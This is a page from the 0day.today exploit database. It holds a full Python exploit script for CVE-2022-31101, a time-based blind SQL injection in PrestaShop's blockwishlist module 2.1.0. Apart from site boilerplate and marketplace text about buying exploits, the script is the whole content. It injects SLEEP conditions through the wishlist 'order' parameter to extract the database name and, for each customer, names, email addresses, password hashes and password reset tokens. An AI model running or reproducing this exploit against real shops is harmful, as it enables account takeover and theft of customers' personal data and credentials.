0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Prestashop blockwishlist module 2.1.0 - SQL injection Exploit
Author
Risk
[
Security Risk High
]0day-ID
Category
Date add
CVE
Platform
# Exploit Title: Prestashop blockwishlist module 2.1.0 - SQLi # Date: 29/07/22 # Exploit Author: Karthik UJ (@5up3r541y4n) # Vendor Homepage: https://www.prestashop.com/en # Software Link (blockwishlist): https://github.com/PrestaShop/blockwishlist/releases/tag/v2.1.0 # Software Link (prestashop): https://hub.docker.com/r/prestashop/prestashop/ # Version (blockwishlist): 2.1.0 # Version (prestashop): 1.7.8.1 # Tested on: Linux # CVE: CVE-2022-31101 # This exploit assumes that the website uses 'ps_' as prefix for the table names since it is the default prefix given by PrestaShop import requests url = input("Enter the url of wishlist's endpoint (http://website.com/module/blockwishlist/view?id_wishlist=1): ") # Example: http://website.com/module/blockwishlist/view?id_wishlist=1 cookie = input("Enter cookie value:\n") header = { "Cookie": cookie } # Define static stuff param = "&order=" staticStart = "p.name, (select case when (" staticEnd = ") then (SELECT SLEEP(7)) else 1 end); -- .asc" charset = 'abcdefghijklmnopqrstuvwxyz1234567890_-@!#$%&\'*+/=?^`{|}~' charset = list(charset) emailCharset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890_-@!#$%&\'*+/=?^`{|}~.' emailCharset = list(emailCharset) # Query current database name length print("\nFinding db name's length:") for length in range(1, 65): condition = "LENGTH(database())=" + str(length) fullUrl = url + param + staticStart + condition + staticEnd try: req = requests.get(fullUrl, headers=header, timeout=8) except requests.exceptions.Timeout: dbLength=length print("Length: ", length, end='') print("\n") break print("Enumerating current database name:") databaseName = '' for i in range(1, dbLength+1): for char in charset: condition = "(SUBSTRING(database()," + str(i) + ",1)='" + char + "')" fullUrl = url + param + staticStart + condition + staticEnd try: req = requests.get(fullUrl, headers=header, timeout=8) except requests.exceptions.Timeout: print(char, end='') databaseName += char break print() # Enumerate any table prefix = "ps_" tableName = prefix + "customer" staticStart = "p.name, (select case when (" staticEnd1 = ") then (SELECT SLEEP(7)) else 1 end from " + tableName + " where id_customer=" staticEnd2 = "); -- .asc" print("\nEnumerating " + tableName + " table") for id in range(1, 10): condition = "id_customer=" + str(id) fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2 try: req = requests.get(fullUrl, headers=header, timeout=8) print("\nOnly " + str(id - 1) + " records found. Exiting...") break except requests.exceptions.Timeout: pass print("\nid = " + str(id)) # Finding firstname length for length in range(0, 100): condition = "LENGTH(firstname)=" + str(length) fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2 try: req = requests.get(fullUrl, headers=header, timeout=8) except requests.exceptions.Timeout: firstnameLength=length print("Firstname length: ", length, end='') print() break # Enumerate firstname firstname = '' print("Firstname: ", end='') for i in range(1, length+1): for char in charset: condition = "SUBSTRING(firstname," + str(i) + ",1)='" + char + "'" fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2 try: req = requests.get(fullUrl, headers=header, timeout=8) except requests.exceptions.Timeout: print(char, end='') firstname += char break print() # Finding lastname length for length in range(1, 100): condition = "LENGTH(lastname)=" + str(length) fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2 try: req = requests.get(fullUrl, headers=header, timeout=8) except requests.exceptions.Timeout: lastnameLength=length print("Lastname length: ", length, end='') print() break # Enumerate lastname lastname = '' print("Lastname: ", end='') for i in range(1, length+1): for char in charset: condition = "SUBSTRING(lastname," + str(i) + ",1)='" + char + "'" fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2 try: req = requests.get(fullUrl, headers=header, timeout=8) except requests.exceptions.Timeout: print(char, end='') firstname += char break print() # Finding email length for length in range(1, 320): condition = "LENGTH(email)=" + str(length) fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2 try: req = requests.get(fullUrl, headers=header, timeout=8) except requests.exceptions.Timeout: emailLength=length print("Email length: ", length, end='') print() break # Enumerate email email = '' print("Email: ", end='') for i in range(1, length+1): for char in emailCharset: condition = "SUBSTRING(email," + str(i) + ",1)= BINARY '" + char + "'" fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2 try: req = requests.get(fullUrl, headers=header, timeout=8) if req.status_code == 500 and char == '.': print(char, end='') email += char except requests.exceptions.Timeout: print(char, end='') email += char break print() # Finding password hash length for length in range(1, 500): condition = "LENGTH(passwd)=" + str(length) fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2 try: req = requests.get(fullUrl, headers=header, timeout=8) except requests.exceptions.Timeout: passwordHashLength=length print("Password hash length: ", length, end='') print() break # Enumerate password hash passwordHash = '' print("Password hash: ", end='') for i in range(1, length+1): for char in emailCharset: condition = "SUBSTRING(passwd," + str(i) + ",1)= BINARY '" + char + "'" fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2 try: req = requests.get(fullUrl, headers=header, timeout=8) if req.status_code == 500 and char == '.': print(char, end='') passwordHash += char except requests.exceptions.Timeout: print(char, end='') passwordHash += char break print() # Finding password reset token length for length in range(0, 500): condition = "LENGTH(reset_password_token)=" + str(length) fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2 try: req = requests.get(fullUrl, headers=header, timeout=8) except requests.exceptions.Timeout: passwordResetTokenLength=length print("Password reset token length: ", length, end='') print() break # Enumerate password reset token passwordResetToken = '' print("Password reset token: ", end='') for i in range(1, length+1): for char in emailCharset: condition = "SUBSTRING(reset_password_token," + str(i) + ",1)= BINARY '" + char + "'" fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2 try: req = requests.get(fullUrl, headers=header, timeout=8) if req.status_code == 500 and char == '.': print(char, end='') passwordResetToken += char except requests.exceptions.Timeout: print(char, end='') passwordResetToken += char break print() # 0day.today [2024-12-25] #